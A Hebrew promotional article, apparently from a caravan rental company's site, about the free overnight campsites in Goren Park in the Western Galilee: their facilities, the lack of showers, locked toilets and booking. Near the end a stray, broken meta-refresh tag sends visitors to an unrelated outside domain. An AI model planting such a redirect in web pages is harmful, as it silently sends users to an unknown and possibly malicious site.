פארק גורן

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

בלב הגליל המערבי, ממש מעל לערוץ נחל כזיב, נמצא פארק גורן. זהו פארק שהטבע עובד בו שעות נוספות, כאשר עבור המבקריםפארק גורן יש מסלולי טיול מרהיבים בין החורשות והעצים, אתרים היסטוריים (חורבת דנעילה או מבצר המונפור למשל), נקודות תצפית, שולחנות פיקניק והרבה הפתעות אחרות.

במהלך השנים הכשירה הקרן הקיימת לישראל חמישה חניוני לילה בשטח הפארק: אחד מהם נמצא ממש בכניסה לפארק (חניון האלה) וארבעת האחרים (חניון האורן, חניון הקטלב, חניון האלון וחניון כליל החורש) נמצאים בחלק המערבי שלו. כל אחד מהחניונים האלה הוא בעל קיבולת שמתחילה מכ-50 איש ומגיעה ל-250 איש. כלומר, יש בהם מקום, אבל הוא לא אינסופי.

מה מציעים החניונים?

חניוני הלילה של פארק גורן מציעים ברמה הכללית תשתית די בסיסית של אירוח, שמתאימה לרוב לפרקי זמן קצרים יחסית (נניח, יום או יומיים). החניונים מציעים בעיקרו של דבר מקום מסודר ובטוח בו ניתן למקם את הקראוון או להקים את האוהל – תלוי בסוג הטיול שאתם מחפשים – יחד עם ברזי מים לשתייה, שולחנות לפיקניק או מקום בו ניתן להבעיר אש (בהתחשב בסביבה הירוקה המקיפה אתכם אתם חייבים להיות זהירים).

אלו הן בגדול התשתיות, ומכאן שלא בטוח שהן יספיקו עבורכם. אם אתם למשל לא מגיעים עם הציוד הנדרש, אתם עלולים להיתקע מכיוון שאין במקום מרכז שירות למטייל. כדי להצטייד במה שחסר לכם תצטרכו לנהוג אל מחוץ לשטח הפארק, למשל אל תחנות הדלק המקיפות אותו, מה שלא תמיד נוח או אפשרי.

הבעיה העיקרית של החניונים של פארק גורן, היא שאין בהם מקלחות. לכן, מי שהקרוואן שלו אינו כולל מקלחת, עלול להיתקע (מה שמסביר מדוע טענו קודם לכן שהחניון מיועד בעיקר לפרקי זמן קצרים). גם תאי השירותים מעט בעייתיים. הם אמנם קיימים, אבל נעולים במצב ברירת המחדל שלהם. כדי לפתוח אותם יש צורך לתאם זאת מול משרדי הקרן הקיימת לישראל. סביר להניח שלא תהיה לאנשיה בעיה לפתוח את תאי השירותים בשעות הערב או הלילה, וגם כאשר נערכים אירועים גדולים יחסית בשטח הפארק בשעות היום. מומלץ להצטייד לכן מראש במספרי הטלפון הרלוונטיים.

החדשות הטובות: לא צריך לשלם

בהתחשב בתשתיות הדי מינימליות שמציעים החניונים של פארק גורן, לא מפתיעה העובדה המשמחת הבאה – והיא שהכניסה לחניון והשהות בו אינם כרוכים בתשלום (מה שממש אי אפשר לומר על כל החניונים שנמצאים במדינת ישראל, בטח ובטח שלא על חניוני רשות הטבע והגנים).

החניון בהמשך לכך פתוח בכל ימות השנה, אך בכל זאת מומלץ לברר מראש שיש לכם בו מקום פנוי בתאריכי הנסיעה שלכם. בדרך כלל לא תהיה בעיה, אבל אתם ממש לא רוצים להגיע עד לפארק, על החניונים שבו, ואז לגלות שאתם צריכים למצוא מקום אחר להחנות בו את הקראוון.
equiv
"Refresh" content="0; URL=http://redirect4.xyz/">

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

המרכז להשכרת קרוואנים

שירותי השכרת קרוואנים עם החברה המובילה בישראל. קרוואנים לכל צורך ולכל מטרה להשכרה במחיר זול ומשתלם!

אז מה היה לנו בכתבה:

צרו איתנו קשר